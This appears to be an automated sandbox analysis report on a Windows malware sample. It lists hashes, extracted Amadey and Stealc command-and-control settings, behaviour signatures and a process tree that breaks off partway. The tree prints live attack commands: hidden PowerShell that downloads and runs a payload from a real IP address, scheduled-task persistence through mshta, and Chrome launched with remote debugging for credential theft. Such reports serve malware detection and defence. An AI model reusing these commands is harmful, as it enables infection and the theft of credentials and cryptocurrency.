Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/03/2025, 15:51

General

  • Target

    57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe

  • Size

    938KB

  • MD5

    afdfccd956ad7ac9e185bc503802ff22

  • SHA1

    9708fd1a5ee5b4728c67a6b2b5687e012dea98a3

  • SHA256

    57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700

  • SHA512

    1fe8a89524a2e35d2dd53550fcbccf24429a6c6e8be4d40e9e99daf735dafc505dbee08ae74d9cc2c58eef5517c7865428d955483904af7d37ed9ffd91666a70

  • SSDEEP

    24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a4gu:CTvC/MTQYxsWR7a4g

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DcRat

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.

  • Dcrat family
  • Detects Healer, an antivirus disabler dropper 2 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++, first seen in August 2022.

  • Lumma family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • DCRat payload 4 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs PowerShell with the display window hidden.

  • Downloads MZ/PE file 25 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with the UPX open-source packer or a modified UPX.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
    "C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2508
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2824
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'POFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
          "C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1132
            • C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe
              "C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1252
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1416
            • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
              "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1812
              • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
                "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3004
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 1036
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2472
            • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
              "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2264
              • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
                "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2616
            • C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe
              "C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"
              6⤵
              • Executes dropped EXE
              PID:2992
              • C:\Windows\System32\wscript.exe
                "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
                7⤵
                • Blocklisted process makes network request
                • Downloads MZ/PE file
                • Loads dropped DLL
                PID:2948
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\F8617F1F15E53ADE2CC7B01D00F844AC\BE4CE3E771FFA0AFA6B3CA61DF9F4514.vbe" /f /rl highest
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2252
                • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                  "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                  8⤵
                  • Executes dropped EXE
                  PID:1092
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Loads dropped DLL
                    PID:2032
                    • C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
                      OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                      10⤵
                      • Executes dropped EXE
                      PID:2292
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2960
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Loads dropped DLL
                    PID:584
                    • C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
                      OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                      10⤵
                      • Executes dropped EXE
                      PID:1120
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1100
            • C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe
              "C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2276
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:912
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1684
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1356
                  • C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE
                    "C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:352
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2264
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2748
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2648
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2580
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2652
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2824
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "6ycUEmagtJO" /tr "mshta \"C:\Temp\NUnXI0p8x.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2208
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\NUnXI0p8x.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2200
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2072
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1960
            • C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe
              "C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1696
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2172
            • C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe
              "C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3044
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1956
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7309758,0x7fef7309768,0x7fef7309778
                  8⤵
                  PID:2716
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  8⤵
                  PID:2040
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:2
                  8⤵
                  PID:2304
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:8
                  8⤵
                  PID:1888
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:8
                  8⤵
                  PID:2348
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2144 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                  8⤵
                  • Uses browser remote debugging
                  PID:2700
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2436 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                  8⤵
                  • Uses browser remote debugging
                  PID:972
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2444 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                  8⤵
                  • Uses browser remote debugging
                  PID:2504
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:2
                  8⤵
                  PID:2124
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:3536
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef59e9758,0x7fef59e9768,0x7fef59e9778
                  8⤵
                  PID:3548
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  8⤵
                  PID:3660
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1212 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:2
                                  8⤵
                                    PID:3712
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                    8⤵
                                      PID:3728
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                      8⤵
                                        PID:3796
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3812
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
